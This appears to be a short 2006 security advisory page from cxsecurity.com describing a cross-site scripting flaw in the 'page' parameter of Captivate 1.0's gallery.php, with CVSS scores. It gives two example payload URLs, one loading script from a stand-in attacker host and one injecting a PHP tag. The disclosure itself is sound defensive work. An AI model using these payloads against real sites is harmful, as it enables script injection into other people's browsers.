Captivate 1.0 - XSS Vuln

2006-06-05 / 2006-06-06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Captivate 1.0 Homepage: http://new-place.org/scripts/ Description: A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images. Effected files: gallery.php Inproper filtering of action ?page= can lead to XSS. Exploit: One way to XSS would be renaming your JavaScript file to an image as an XSS vector: http://www.example.com/gallery.php?page=5<SCRIPT SRC=http://evilsite.com/xss.jpg></SCRIPT> Anoother one be: http://www.example.com/gallery.php?page=<?phpinfo();?> The current version of this script puts slashes in for ' and " but alot of other characters aren't filtered.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top